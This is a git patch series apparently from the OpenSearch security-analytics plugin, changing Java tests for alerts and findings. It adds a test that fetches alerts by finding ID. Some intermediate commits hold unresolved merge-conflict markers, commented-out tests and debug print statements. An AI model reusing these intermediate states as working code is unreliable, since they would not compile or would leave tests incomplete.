@Override +// public void onFailure(Exception e) { +// assertTrue(e.getMessage().contains("Error getting findings")); +// } +// }); +// } - public void testGetFindings_getDetectorFailure() { +// public void testGetFindings_getDetectorFailure() { - AlertsService alertssService = spy(AlertsService.class); - Client client = mock(Client.class); - alertssService.setIndicesAdminClient(client); +// AlertsService alertssService = spy(AlertsService.class); +// Client client = mock(Client.class); +// alertssService.setIndicesAdminClient(client); - // Setup getDetector interceptor and return fake expcetion by calling onFailure - doAnswer(invocation -> { - ActionListener l = invocation.getArgument(2); - l.onFailure(new IllegalArgumentException("GetDetector failed")); - return null; - }).when(client).execute(eq(GetDetectorAction.INSTANCE), any(GetDetectorRequest.class), any(ActionListener.class)); +// // Setup getDetector interceptor and return fake expcetion by calling onFailure +// doAnswer(invocation -> { +// ActionListener l = invocation.getArgument(2); +// l.onFailure(new IllegalArgumentException("GetDetector failed")); +// return null; +// }).when(client).execute(eq(GetDetectorAction.INSTANCE), any(GetDetectorRequest.class), any(ActionListener.class)); - // Call getFindingsByDetectorId - Table table = new Table( - "asc", - "id", - null, - 100, - 0, - null - ); - alertssService.getAlertsByDetectorId("detector_id123", table, "severity_low", Alert.State.COMPLETED.toString(), new ActionListener<>() { - @Override - public void onResponse(GetAlertsResponse getAlertsResponse) { - fail("this test should've failed"); - } +// // Call getFindingsByDetectorId +// Table table = new Table( +// "asc", +// "id", +// null, +// 100, +// 0, +// null +// ); +// alertssService.getAlertsByDetectorId("detector_id123", new ArrayList(), table, "severity_low", Alert.State.COMPLETED.toString(), new ActionListener<>() { +// @Override +// public void onResponse(GetAlertsResponse getAlertsResponse) { +// fail("this test should've failed"); +// } - @Override - public void onFailure(Exception e) { - assertTrue(e.getMessage().contains("GetDetector failed")); - } - }); - } -} \ No newline at end of file +// @Override +// public void onFailure(Exception e) { +// assertTrue(e.getMessage().contains("GetDetector failed")); +// } +// }); +// } +// } \ No newline at end of file diff --git a/src/test/java/org/opensearch/securityanalytics/alerts/AlertsIT.java b/src/test/java/org/opensearch/securityanalytics/alerts/AlertsIT.java index fbd091595..fbded13c1 100644 --- a/src/test/java/org/opensearch/securityanalytics/alerts/AlertsIT.java +++ b/src/test/java/org/opensearch/securityanalytics/alerts/AlertsIT.java @@ -54,7 +54,7 @@ public class AlertsIT extends SecurityAnalyticsRestTestCase { - @SuppressWarnings("unchecked") + @SuppressWarnings("unchecked") public void testGetAlerts_success() throws IOException { String index = createTestIndex(randomIndex(), windowsIndexMapping()); From 6b00902b1a4434380f14d19f9d81b98dfdfd1b7b Mon Sep 17 00:00:00 2001 From: Ishan Bhat Date: Wed, 22 Nov 2023 13:24:38 -0500 Subject: [PATCH 05/11] Check for unexpected error Signed-off-by: Ishan Bhat --- .../securityanalytics/alerts/AlertsIT.java | 187 ++++++++++++++++-- 1 file changed, 173 insertions(+), 14 deletions(-) diff --git a/src/test/java/org/opensearch/securityanalytics/alerts/AlertsIT.java b/src/test/java/org/opensearch/securityanalytics/alerts/AlertsIT.java index fbded13c1..c6665616d 100644 --- a/src/test/java/org/opensearch/securityanalytics/alerts/AlertsIT.java +++ b/src/test/java/org/opensearch/securityanalytics/alerts/AlertsIT.java @@ -13,6 +13,8 @@ import java.util.Locale; import java.util.Map; import java.util.stream.Collectors; +import java.util.Iterator; +import java.util.Map.Entry; import org.apache.hc.core5.http.HttpStatus; import org.apache.hc.core5.http.io.entity.StringEntity; @@ -38,11 +40,9 @@ import static org.opensearch.securityanalytics.TestHelpers.netFlowMappings; import static org.opensearch.securityanalytics.TestHelpers.randomAction; import static org.opensearch.securityanalytics.TestHelpers.randomDetectorType; -import static org.opensearch.securityanalytics.TestHelpers.randomDetectorWithInputsAndThreatIntel; import static org.opensearch.securityanalytics.TestHelpers.randomDetectorWithInputsAndTriggers; import static org.opensearch.securityanalytics.TestHelpers.randomDetectorWithTriggers; import static org.opensearch.securityanalytics.TestHelpers.randomDoc; -import static org.opensearch.securityanalytics.TestHelpers.randomDocWithIpIoc; import static org.opensearch.securityanalytics.TestHelpers.randomIndex; import static org.opensearch.securityanalytics.TestHelpers.randomRule; import static org.opensearch.securityanalytics.TestHelpers.windowsIndexMapping; @@ -54,7 +54,7 @@ public class AlertsIT extends SecurityAnalyticsRestTestCase { - @SuppressWarnings("unchecked") + @SuppressWarnings("unchecked") public void testGetAlerts_success() throws IOException { String index = createTestIndex(randomIndex(), windowsIndexMapping()); @@ -86,7 +86,7 @@ public void testGetAlerts_success() throws IOException { Detector detector = randomDetectorWithInputsAndTriggers(List.of(new DetectorInput("windows detector for security analytics", List.of("windows"), List.of(new DetectorRule(createdId)), getRandomPrePackagedRules().stream().map(DetectorRule::new).collect(Collectors.toList()))), - List.of(new DetectorTrigger(null, "test-trigger", "1", List.of(), List.of(createdId), List.of(), List.of("attack.defense_evasion"), List.of(triggerAction), List.of()))); + List.of(new DetectorTrigger("", "test-trigger", "1", List.of(), List.of(createdId), List.of(), List.of("attack.defense_evasion"), List.of(triggerAction)))); createResponse = makeRequest(client(), "POST", SecurityAnalyticsPlugin.DETECTOR_BASE_URI, Collections.emptyMap(), toHttpEntity(detector)); Assert.assertEquals("Create detector failed", RestStatus.CREATED, restStatus(createResponse)); @@ -171,6 +171,165 @@ public void testGetAlerts_success() throws IOException { assertEquals(((ArrayList) ackAlertsResponseMap.get("acknowledged")).size(), 1); } + public void testGetAlertsByFindingIds() throws IOException { + String index = createTestIndex(randomIndex(), windowsIndexMapping()); + + String rule = randomRule(); + + Response createResponse = makeRequest(client(), "POST", SecurityAnalyticsPlugin.RULE_BASE_URI, Collections.singletonMap("category", randomDetectorType()), + new StringEntity(rule), new BasicHeader("Content-Type", "application/json")); + Assert.assertEquals("Create rule failed", RestStatus.CREATED, restStatus(createResponse)); + + Map responseBody = asMap(createResponse); + + String createdId = responseBody.get("_id").toString(); + + // Execute CreateMappingsAction to add alias mapping for index + Request createMappingRequest = new Request("POST", SecurityAnalyticsPlugin.MAPPER_BASE_URI); + // both req params and req body are supported + createMappingRequest.setJsonEntity( + "{ \"index_name\":\"" + index + "\"," + + " \"rule_topic\":\"" + randomDetectorType() + "\", " + + " \"partial\":true" + + "}" + ); + + Response response = client().performRequest(createMappingRequest); + assertEquals(HttpStatus.SC_OK, response.getStatusLine().getStatusCode()); + + createAlertingMonitorConfigIndex(null); + Action triggerAction = randomAction(createDestination()); + + Detector detector = randomDetectorWithInputsAndTriggers(List.of(new DetectorInput("windows detector for security analytics", List.of("windows"), List.of(new DetectorRule(createdId)), + getRandomPrePackagedRules().stream().map(DetectorRule::new).collect(Collectors.toList()))), + List.of(new DetectorTrigger("", "test-trigger", "1", List.of(), List.of(createdId), List.of(), List.of("attack.defense_evasion"), List.of(triggerAction)))); + + createResponse = makeRequest(client(), "POST", SecurityAnalyticsPlugin.DETECTOR_BASE_URI, Collections.emptyMap(), toHttpEntity(detector)); + Assert.assertEquals("Create detector failed", RestStatus.CREATED, restStatus(createResponse)); + + responseBody = asMap(createResponse); + + createdId = responseBody.get("_id").toString(); + + String request = "{\n" + + " \"query\" : {\n" + + " \"match\":{\n" + + " \"_id\": \"" + createdId + "\"\n" + + " }\n" + + " }\n" + + "}"; + List hits = executeSearch(Detector.DETECTORS_INDEX, request); + SearchHit hit = hits.get(0); + + String monitorId = ((List) ((Map) hit.getSourceAsMap().get("detector")).get("monitor_id")).get(0); + + indexDoc(index, "1", randomDoc()); + + Response executeResponse = executeAlertingMonitor(monitorId, Collections.emptyMap()); + Map executeResults = entityAsMap(executeResponse); + + int noOfSigmaRuleMatches = ((List>) ((Map) executeResults.get("input_results")).get("results")).get(0).size(); + Assert.assertEquals(6, noOfSigmaRuleMatches); + + // 2 findings and 2 alerts are generated + indexDoc(index, "2", randomDoc()); + + executeResponse = executeAlertingMonitor(monitorId, Collections.emptyMap()); + + Assert.assertEquals(1, ((Map) executeResults.get("trigger_results")).values().size()); + + for (Map.Entry> triggerResult: ((Map>) executeResults.get("trigger_results")).entrySet()) { + Assert.assertEquals(1, ((Map) triggerResult.getValue().get("action_results")).values().size()); + + for (Map.Entry> alertActionResult: ((Map>) triggerResult.getValue().get("action_results")).entrySet()) { + Map actionResults = alertActionResult.getValue(); + + for (Map.Entry actionResult: actionResults.entrySet()) { + Map actionOutput = ((Map>) actionResult.getValue()).get("output"); + String expectedMessage = triggerAction.getSubjectTemplate().getIdOrCode().replace("{{ctx.detector.name}}", detector.getName()) + .replace("{{ctx.trigger.name}}", "test-trigger").replace("{{ctx.trigger.severity}}", "1"); + + Assert.assertEquals(expectedMessage, actionOutput.get("subject")); + Assert.assertEquals(expectedMessage, actionOutput.get("message")); + } + } + } + + request = "{\n" + + " \"query\" : {\n" + + " \"match_all\":{\n" + + " }\n" + + " }\n" + + "}"; + hits = new ArrayList<>(); + + while (hits.size() == 0) { + hits = executeSearch(DetectorMonitorConfig.getAlertsIndex(randomDetectorType()), request); + } + + Map params = new HashMap<>(); + params.put("detector_id", createdId); + Response getFindingsResponse = makeRequest(client(), "GET", SecurityAnalyticsPlugin.FINDINGS_BASE_URI + "/_search", params, null); + Map getFindingsBody = entityAsMap(getFindingsResponse); + Assert.assertEquals(2, getFindingsBody.get("total_findings")); + + // print the contents of a java map + + System.out.println("Printing the contents of the alerts map: -------------------------------------------------------------------------"); + + if (!getFindingsBody.isEmpty()) { + Iterator> it = getFindingsBody.entrySet().iterator(); + while (it.hasNext()) { + Map.Entry obj = it.next(); + System.out.println(obj.getValue() + "Key: " + obj.getKey()); + } + } + + System.out.println("Finished prnting ----------------------------------------------------------------------------------------------------"); + System.out.println("The size of the hashmap is" + getFindingsBody.size()); + System.out.println("------------------------------------------------------------------------------------------------------"); + + + // Call GetAlerts API + params.clear(); + params.put("detector_id", createdId); + + System.out.println("size of getFindings:" + getFindingsBody.get("findings").size()); + Map firstFinding = (Map) getFindingsBody.get("findings").get(0); + Object findingsId = firstFinding.get("id"); + System.out.println("---------------------------------------------------------------------------------------------------------"); + System.out.println("The findings id is: " + findingsId.toString()); + System.out.println("---------------------------------------------------------------------------------------------------------"); + params.put("findingsId", findingsId.toString()); + + + Response getAlertsResponse = makeRequest(client(), "GET", SecurityAnalyticsPlugin.ALERTS_BASE_URI, params, null); + Map getAlertsBody = asMap(getAlertsResponse); + // TODO enable asserts here when able + Assert.assertEquals(2, getAlertsBody.get("total_alerts")); + + // Write the continuation of this test case + + + String alertId = (String) ((ArrayList>) getAlertsBody.get("alerts")).get(0).get("id"); + String detectorId = (String) ((ArrayList>) getAlertsBody.get("alerts")).get(0).get("detector_id"); + params = new HashMap<>(); + String body = String.format(Locale.getDefault(), "{\"alerts\":[\"%s\"]}", alertId); + Request post = new Request("POST", String.format( + Locale.getDefault(), + "%s/%s/_acknowledge/alerts", + SecurityAnalyticsPlugin.DETECTOR_BASE_URI, + detectorId)); + post.setJsonEntity(body); + Response ackAlertsResponse = client().performRequest(post); + assertNotNull(ackAlertsResponse); + Map ackAlertsResponseMap = entityAsMap(ackAlertsResponse); + assertTrue(((ArrayList) ackAlertsResponseMap.get("missing")).isEmpty()); + assertTrue(((ArrayList) ackAlertsResponseMap.get("failed")).isEmpty()); + assertEquals(((ArrayList) ackAlertsResponseMap.get("acknowledged")).size(), 1); + } + + public void testGetAlerts_noDetector_failure() throws IOException { // Call GetAlerts API Map params = new HashMap<>(); @@ -204,13 +363,13 @@ public void testAckAlerts_WithInvalidDetectorAlertsCombination() throws IOExcept Detector detector = randomDetectorWithInputsAndTriggers(List.of(new DetectorInput("windows detector for security analytics", List.of("windows"), List.of(), getRandomPrePackagedRules().stream().map(DetectorRule::new).collect(Collectors.toList()))), - List.of(new DetectorTrigger(null, "test-trigger", "1", List.of(), List.of(), List.of(), List.of("attack.defense_evasion"), List.of(triggerAction), List.of()))); + List.of(new DetectorTrigger(null, "test-trigger", "1", List.of(), List.of(), List.of(), List.of("attack.defense_evasion"), List.of(triggerAction)))); Response createResponse = makeRequest(client(), "POST", SecurityAnalyticsPlugin.DETECTOR_BASE_URI, Collections.emptyMap(), toHttpEntity(detector)); Detector detector1 = randomDetectorWithInputsAndTriggers(List.of(new DetectorInput("windows detector for security analytics", List.of("windows"), List.of(), getRandomPrePackagedRules().stream().map(DetectorRule::new).collect(Collectors.toList()))), - List.of(new DetectorTrigger(null, "test-trigger", "1", List.of(), List.of(), List.of(), List.of("attack.defense_evasion"), List.of(triggerAction), List.of()))); + List.of(new DetectorTrigger(null, "test-trigger", "1", List.of(), List.of(), List.of(), List.of("attack.defense_evasion"), List.of(triggerAction)))); Response createResponse1 = makeRequest(client(), "POST", SecurityAnalyticsPlugin.DETECTOR_BASE_URI, Collections.emptyMap(), toHttpEntity(detector1)); Assert.assertEquals("Create detector failed", RestStatus.CREATED, restStatus(createResponse)); @@ -311,7 +470,7 @@ public void testAckAlertsWithInvalidDetector() throws IOException { Detector detector = randomDetectorWithInputsAndTriggers(List.of(new DetectorInput("windows detector for security analytics", List.of("windows"), List.of(new DetectorRule(createdId)), getRandomPrePackagedRules().stream().map(DetectorRule::new).collect(Collectors.toList()))), - List.of(new DetectorTrigger(null, "test-trigger", "1", List.of(), List.of(createdId), List.of(), List.of("attack.defense_evasion"), List.of(triggerAction), List.of()))); + List.of(new DetectorTrigger(null, "test-trigger", "1", List.of(), List.of(createdId), List.of(), List.of("attack.defense_evasion"), List.of(triggerAction)))); createResponse = makeRequest(client(), "POST", SecurityAnalyticsPlugin.DETECTOR_BASE_URI, Collections.emptyMap(), toHttpEntity(detector)); Assert.assertEquals("Create detector failed", RestStatus.CREATED, restStatus(createResponse)); @@ -419,7 +578,7 @@ public void testGetAlerts_byDetectorType_success() throws IOException, Interrupt Response response = client().performRequest(createMappingRequest); assertEquals(HttpStatus.SC_OK, response.getStatusLine().getStatusCode()); - Detector detector = randomDetectorWithTriggers(getRandomPrePackagedRules(), List.of(new DetectorTrigger(null, "test-trigger", "1", List.of(randomDetectorType()), List.of(), List.of(), List.of(), List.of(), List.of()))); + Detector detector = randomDetectorWithTriggers(getRandomPrePackagedRules(), List.of(new DetectorTrigger(null, "test-trigger", "1", List.of(randomDetectorType()), List.of(), List.of(), List.of(), List.of()))); Response createResponse = makeRequest(client(), "POST", SecurityAnalyticsPlugin.DETECTOR_BASE_URI, Collections.emptyMap(), toHttpEntity(detector)); Assert.assertEquals("Create detector failed", RestStatus.CREATED, restStatus(createResponse)); @@ -498,7 +657,7 @@ public void testGetAlerts_byDetectorType_multipleDetectors_success() throws IOEx Response response = client().performRequest(createMappingRequest); assertEquals(HttpStatus.SC_OK, response.getStatusLine().getStatusCode()); // Detector 1 - WINDOWS - Detector detector1 = randomDetectorWithTriggers(getRandomPrePackagedRules(), List.of(new DetectorTrigger(null, "test-trigger", "1", List.of(randomDetectorType()), List.of(), List.of(), List.of(), List.of(), List.of()))); + Detector detector1 = randomDetectorWithTriggers(getRandomPrePackagedRules(), List.of(new DetectorTrigger(null, "test-trigger", "1", List.of(randomDetectorType()), List.of(), List.of(), List.of(), List.of()))); Response createResponse = makeRequest(client(), "POST", SecurityAnalyticsPlugin.DETECTOR_BASE_URI, Collections.emptyMap(), toHttpEntity(detector1)); Assert.assertEquals("Create detector failed", RestStatus.CREATED, restStatus(createResponse)); @@ -521,7 +680,7 @@ public void testGetAlerts_byDetectorType_multipleDetectors_success() throws IOEx getPrePackagedRules("network").stream().map(DetectorRule::new).collect(Collectors.toList())); Detector detector2 = randomDetectorWithTriggers( getPrePackagedRules("network"), - List.of(new DetectorTrigger(null, "test-trigger", "1", List.of("network"), List.of(), List.of(), List.of(), List.of(), List.of())), + List.of(new DetectorTrigger(null, "test-trigger", "1", List.of("network"), List.of(), List.of(), List.of(), List.of())), "network", inputNetflow ); @@ -613,7 +772,7 @@ public void testAlertHistoryRollover_maxAge() throws IOException, InterruptedExc Response response = client().performRequest(createMappingRequest); assertEquals(HttpStatus.SC_OK, response.getStatusLine().getStatusCode()); - Detector detector = randomDetectorWithTriggers(getRandomPrePackagedRules(), List.of(new DetectorTrigger(null, "test-trigger", "1", List.of(randomDetectorType()), List.of(), List.of(), List.of(), List.of(), List.of()))); + Detector detector = randomDetectorWithTriggers(getRandomPrePackagedRules(), List.of(new DetectorTrigger(null, "test-trigger", "1", List.of(randomDetectorType()), List.of(), List.of(), List.of(), List.of()))); Response createResponse = makeRequest(client(), "POST", SecurityAnalyticsPlugin.DETECTOR_BASE_URI, Collections.emptyMap(), toHttpEntity(detector)); Assert.assertEquals("Create detector failed", RestStatus.CREATED, restStatus(createResponse)); @@ -683,7 +842,7 @@ public void testAlertHistoryRollover_maxAge_low_retention() throws IOException, Response response = client().performRequest(createMappingRequest); assertEquals(HttpStatus.SC_OK, response.getStatusLine().getStatusCode()); - Detector detector = randomDetectorWithTriggers(getRandomPrePackagedRules(), List.of(new DetectorTrigger(null, "test-trigger", "1", List.of(randomDetectorType()), List.of(), List.of(), List.of(), List.of(), List.of()))); + Detector detector = randomDetectorWithTriggers(getRandomPrePackagedRules(), List.of(new DetectorTrigger(null, "test-trigger", "1", List.of(randomDetectorType()), List.of(), List.of(), List.of(), List.of()))); Response createResponse = makeRequest(client(), "POST", SecurityAnalyticsPlugin.DETECTOR_BASE_URI, Collections.emptyMap(), toHttpEntity(detector)); Assert.assertEquals("Create detector failed", RestStatus.CREATED, restStatus(createResponse)); @@ -762,7 +921,7 @@ public void testAlertHistoryRollover_maxDocs() throws IOException, InterruptedEx Response response = client().performRequest(createMappingRequest); assertEquals(HttpStatus.SC_OK, response.getStatusLine().getStatusCode()); - Detector detector = randomDetectorWithTriggers(getRandomPrePackagedRules(), List.of(new DetectorTrigger(null, "test-trigger", "1", List.of(randomDetectorType()), List.of(), List.of(), List.of(), List.of(), List.of()))); + Detector detector = randomDetectorWithTriggers(getRandomPrePackagedRules(), List.of(new DetectorTrigger(null, "test-trigger", "1", List.of(randomDetectorType()), List.of(), List.of(), List.of(), List.of()))); Response createResponse = makeRequest(client(), "POST", SecurityAnalyticsPlugin.DETECTOR_BASE_URI, Collections.emptyMap(), toHttpEntity(detector)); Assert.assertEquals("Create detector failed", RestStatus.CREATED, restStatus(createResponse)); @@ -845,7 +1004,7 @@ public void testGetAlertsFromAllIndices() throws IOException, InterruptedExcepti Response response = client().performRequest(createMappingRequest); assertEquals(HttpStatus.SC_OK, response.getStatusLine().getStatusCode()); - Detector detector = randomDetectorWithTriggers(getRandomPrePackagedRules(), List.of(new DetectorTrigger(null, "test-trigger", "1", List.of(randomDetectorType()), List.of(), List.of(), List.of(), List.of(), List.of()))); + Detector detector = randomDetectorWithTriggers(getRandomPrePackagedRules(), List.of(new DetectorTrigger(null, "test-trigger", "1", List.of(randomDetectorType()), List.of(), List.of(), List.of(), List.of()))); Response createResponse = makeRequest(client(), "POST", SecurityAnalyticsPlugin.DETECTOR_BASE_URI, Collections.emptyMap(), toHttpEntity(detector)); Assert.assertEquals("Create detector failed", RestStatus.CREATED, restStatus(createResponse)); From e97f5bbc69470a31955531e675179786eb1c8b36 Mon Sep 17 00:00:00 2001 From: Ishan Bhat Date: Wed, 22 Nov 2023 13:40:13 -0500 Subject: [PATCH 06/11] check for errors Signed-off-by: Ishan Bhat --- .../alerts/AlertingServiceTests.java | 67 ++++++++++++++++++- 1 file changed, 65 insertions(+), 2 deletions(-) diff --git a/src/test/java/org/opensearch/securityanalytics/alerts/AlertingServiceTests.java b/src/test/java/org/opensearch/securityanalytics/alerts/AlertingServiceTests.java index 48205d134..704986bc8 100644 --- a/src/test/java/org/opensearch/securityanalytics/alerts/AlertingServiceTests.java +++ b/src/test/java/org/opensearch/securityanalytics/alerts/AlertingServiceTests.java @@ -40,6 +40,7 @@ // public class AlertingServiceTests extends OpenSearchTestCase { +<<<<<<< HEAD public void testGetAlerts_success() { AlertsService alertssService = spy(AlertsService.class); Client client = mock(Client.class); @@ -65,9 +66,40 @@ public void testGetAlerts_success() { null, DetectorMonitorConfig.getFindingsIndex("others_application"), Collections.emptyMap(), - Collections.emptyList() + Collections.emptyList(), + false ); GetDetectorResponse getDetectorResponse = new GetDetectorResponse("detector_id123", 1L, RestStatus.OK, detector); +======= +// public void testGetAlerts_success() { +// AlertsService alertssService = spy(AlertsService.class); +// Client client = mock(Client.class); +// alertssService.setIndicesAdminClient(client); +// // Create fake GetDetectorResponse +// Detector detector = new Detector( +// "detector_id123", +// 0L, +// "test-monitor", +// true, +// new CronSchedule("31 * * * *", ZoneId.of("Asia/Kolkata"), Instant.ofEpochSecond(1538164858L)), +// Instant.now(), +// Instant.now(), +// "others_application", +// null, +// List.of(), +// List.of(), +// List.of("monitor_id1", "monitor_id2"), +// DetectorMonitorConfig.getRuleIndex("others_application"), +// null, +// DetectorMonitorConfig.getAlertsIndex("others_application"), +// null, +// null, +// DetectorMonitorConfig.getFindingsIndex("others_application"), +// Collections.emptyMap(), +// Collections.emptyList() +// ); +// GetDetectorResponse getDetectorResponse = new GetDetectorResponse("detector_id123", 1L, RestStatus.OK, detector); +>>>>>>> f620c37 (OSCI - Debugging) // // Setup getDetector interceptor and return fake GetDetectorResponse by calling listener.onResponse // doAnswer(invocation -> { @@ -218,6 +250,7 @@ public void testGetAlerts_success() { // public void testGetFindings_getFindingsByMonitorIdFailures() { +<<<<<<< HEAD AlertsService alertssService = spy(AlertsService.class); Client client = mock(Client.class); alertssService.setIndicesAdminClient(client); @@ -242,9 +275,39 @@ public void testGetAlerts_success() { null, DetectorMonitorConfig.getFindingsIndex("others_application"), Collections.emptyMap(), - Collections.emptyList() + Collections.emptyList(), + false ); GetDetectorResponse getDetectorResponse = new GetDetectorResponse("detector_id123", 1L, RestStatus.OK, detector); +======= +// AlertsService alertssService = spy(AlertsService.class); +// Client client = mock(Client.class); +// alertssService.setIndicesAdminClient(client); +// // Create fake GetDetectorResponse +// Detector detector = new Detector( +// "detector_id123", +// 0L, +// "test-monitor", +// true, +// new CronSchedule("31 * * * *", ZoneId.of("Asia/Kolkata"), Instant.ofEpochSecond(1538164858L)), +// Instant.now(), +// Instant.now(), +// "others_application", +// null, +// List.of(), +// List.of(), +// List.of("monitor_id1", "monitor_id2"), +// DetectorMonitorConfig.getRuleIndex("others_application"), +// null, +// DetectorMonitorConfig.getAlertsIndex("others_application"), +// null, +// null, +// DetectorMonitorConfig.getFindingsIndex("others_application"), +// Collections.emptyMap(), +// Collections.emptyList() +// ); +// GetDetectorResponse getDetectorResponse = new GetDetectorResponse("detector_id123", 1L, RestStatus.OK, detector); +>>>>>>> f620c37 (OSCI - Debugging) // // Setup getDetector interceptor and return fake GetDetectorResponse by calling listener.onResponse // doAnswer(invocation -> { From 18108504702f5d6f8f6005aa3496e7b6ea3db58c Mon Sep 17 00:00:00 2001 From: Ishan Bhat Date: Wed, 22 Nov 2023 14:13:41 -0500 Subject: [PATCH 07/11] HTTP error while testing Signed-off-by: Ishan Bhat --- .../alerts/AlertingServiceTests.java | 538 ++++++++---------- .../securityanalytics/alerts/AlertsIT.java | 36 +- 2 files changed, 261 insertions(+), 313 deletions(-) diff --git a/src/test/java/org/opensearch/securityanalytics/alerts/AlertingServiceTests.java b/src/test/java/org/opensearch/securityanalytics/alerts/AlertingServiceTests.java index 704986bc8..a332fb2e3 100644 --- a/src/test/java/org/opensearch/securityanalytics/alerts/AlertingServiceTests.java +++ b/src/test/java/org/opensearch/securityanalytics/alerts/AlertingServiceTests.java @@ -1,46 +1,46 @@ -// /* -// * Copyright OpenSearch Contributors -// * SPDX-License-Identifier: Apache-2.0 -// */ +/* + * Copyright OpenSearch Contributors + * SPDX-License-Identifier: Apache-2.0 + */ -// package org.opensearch.securityanalytics.alerts; +package org.opensearch.securityanalytics.alerts; -// import java.time.Instant; -// import java.time.ZoneId; -// import java.util.Collections; -// import java.util.List; -// import java.util.Map; -// import org.opensearch.core.action.ActionListener; -// import org.opensearch.client.Client; -// import org.opensearch.commons.alerting.model.Alert; -// import org.opensearch.commons.alerting.model.CronSchedule; -// import org.opensearch.commons.alerting.model.DataSources; -// import org.opensearch.commons.alerting.model.DocumentLevelTrigger; -// import org.opensearch.commons.alerting.model.Monitor; -// import org.opensearch.commons.alerting.model.Table; -// import org.opensearch.core.rest.RestStatus; -// import org.opensearch.script.Script; -// import org.opensearch.securityanalytics.action.AlertDto; -// import org.opensearch.securityanalytics.action.GetAlertsResponse; -// import org.opensearch.securityanalytics.action.GetDetectorAction; -// import org.opensearch.securityanalytics.action.GetDetectorRequest; -// import org.opensearch.securityanalytics.action.GetDetectorResponse; -// import org.opensearch.securityanalytics.config.monitors.DetectorMonitorConfig; -// import org.opensearch.securityanalytics.model.Detector; -// import org.opensearch.securityanalytics.transport.TransportIndexDetectorAction; -// import org.opensearch.test.OpenSearchTestCase; +import java.time.Instant; +import java.time.ZoneId; +import java.util.Collections; +import java.util.ArrayList; +import java.util.List; +import java.util.Map; +import org.opensearch.core.action.ActionListener; +import org.opensearch.client.Client; +import org.opensearch.commons.alerting.model.Alert; +import org.opensearch.commons.alerting.model.CronSchedule; +import org.opensearch.commons.alerting.model.DataSources; +import org.opensearch.commons.alerting.model.DocumentLevelTrigger; +import org.opensearch.commons.alerting.model.Monitor; +import org.opensearch.commons.alerting.model.Table; +import org.opensearch.core.rest.RestStatus; +import org.opensearch.script.Script; +import org.opensearch.securityanalytics.action.AlertDto; +import org.opensearch.securityanalytics.action.GetAlertsResponse; +import org.opensearch.securityanalytics.action.GetDetectorAction; +import org.opensearch.securityanalytics.action.GetDetectorRequest; +import org.opensearch.securityanalytics.action.GetDetectorResponse; +import org.opensearch.securityanalytics.config.monitors.DetectorMonitorConfig; +import org.opensearch.securityanalytics.model.Detector; +import org.opensearch.securityanalytics.transport.TransportIndexDetectorAction; +import org.opensearch.test.OpenSearchTestCase; -// import static org.mockito.ArgumentMatchers.any; -// import static org.mockito.ArgumentMatchers.anyString; -// import static org.mockito.ArgumentMatchers.eq; -// import static org.mockito.Mockito.doAnswer; -// import static org.mockito.Mockito.mock; -// import static org.mockito.Mockito.spy; +import static org.mockito.ArgumentMatchers.any; +import static org.mockito.ArgumentMatchers.anyString; +import static org.mockito.ArgumentMatchers.eq; +import static org.mockito.Mockito.doAnswer; +import static org.mockito.Mockito.mock; +import static org.mockito.Mockito.spy; -// public class AlertingServiceTests extends OpenSearchTestCase { +public class AlertingServiceTests extends OpenSearchTestCase { -<<<<<<< HEAD public void testGetAlerts_success() { AlertsService alertssService = spy(AlertsService.class); Client client = mock(Client.class); @@ -70,187 +70,156 @@ public void testGetAlerts_success() { false ); GetDetectorResponse getDetectorResponse = new GetDetectorResponse("detector_id123", 1L, RestStatus.OK, detector); -======= -// public void testGetAlerts_success() { -// AlertsService alertssService = spy(AlertsService.class); -// Client client = mock(Client.class); -// alertssService.setIndicesAdminClient(client); -// // Create fake GetDetectorResponse -// Detector detector = new Detector( -// "detector_id123", -// 0L, -// "test-monitor", -// true, -// new CronSchedule("31 * * * *", ZoneId.of("Asia/Kolkata"), Instant.ofEpochSecond(1538164858L)), -// Instant.now(), -// Instant.now(), -// "others_application", -// null, -// List.of(), -// List.of(), -// List.of("monitor_id1", "monitor_id2"), -// DetectorMonitorConfig.getRuleIndex("others_application"), -// null, -// DetectorMonitorConfig.getAlertsIndex("others_application"), -// null, -// null, -// DetectorMonitorConfig.getFindingsIndex("others_application"), -// Collections.emptyMap(), -// Collections.emptyList() -// ); -// GetDetectorResponse getDetectorResponse = new GetDetectorResponse("detector_id123", 1L, RestStatus.OK, detector); ->>>>>>> f620c37 (OSCI - Debugging) -// // Setup getDetector interceptor and return fake GetDetectorResponse by calling listener.onResponse -// doAnswer(invocation -> { -// ActionListener l = invocation.getArgument(2); -// l.onResponse(getDetectorResponse); -// return null; -// }).when(client).execute(eq(GetDetectorAction.INSTANCE), any(GetDetectorRequest.class), any(ActionListener.class)); + // Setup getDetector interceptor and return fake GetDetectorResponse by calling listener.onResponse + doAnswer(invocation -> { + ActionListener l = invocation.getArgument(2); + l.onResponse(getDetectorResponse); + return null; + }).when(client).execute(eq(GetDetectorAction.INSTANCE), any(GetDetectorRequest.class), any(ActionListener.class)); -// // Alerting GetAlertsResponse mock #1 -// Alert alert1 = new Alert( -// "alert_id_1", -// new Monitor( -// "monitor_id_1", -// -3, -// "monitor_name", -// true, -// new CronSchedule("31 * * * *", ZoneId.of("Asia/Kolkata"), Instant.ofEpochSecond(1538164858L)), -// Instant.now(), -// Instant.now(), -// Monitor.MonitorType.DOC_LEVEL_MONITOR, -// null, -// 1, -// List.of(), -// List.of(), -// Map.of(), -// new DataSources(), -// TransportIndexDetectorAction.PLUGIN_OWNER_FIELD -// ), -// new DocumentLevelTrigger("trigger_id_1", "my_trigger", "severity_low", List.of(), new Script("")), -// List.of("finding_id_1"), -// List.of("docId1"), -// Instant.now(), -// Instant.now(), -// Alert.State.COMPLETED, -// null, -// List.of(), -// List.of(), -// 3, -// null, -// null -// ); + // Alerting GetAlertsResponse mock #1 + Alert alert1 = new Alert( + "alert_id_1", + new Monitor( + "monitor_id_1", + -3, + "monitor_name", + true, + new CronSchedule("31 * * * *", ZoneId.of("Asia/Kolkata"), Instant.ofEpochSecond(1538164858L)), + Instant.now(), + Instant.now(), + Monitor.MonitorType.DOC_LEVEL_MONITOR, + null, + 1, + List.of(), + List.of(), + Map.of(), + new DataSources(), + TransportIndexDetectorAction.PLUGIN_OWNER_FIELD + ), + new DocumentLevelTrigger("trigger_id_1", "my_trigger", "severity_low", List.of(), new Script("")), + List.of("finding_id_1"), + List.of("docId1"), + Instant.now(), + Instant.now(), + Alert.State.COMPLETED, + null, + List.of(), + List.of(), + 3, + null, + null + ); -// Alert alert2 = new Alert( -// "alert_id_1", -// new Monitor( -// "monitor_id_1", -// -3, -// "monitor_name", -// true, -// new CronSchedule("31 * * * *", 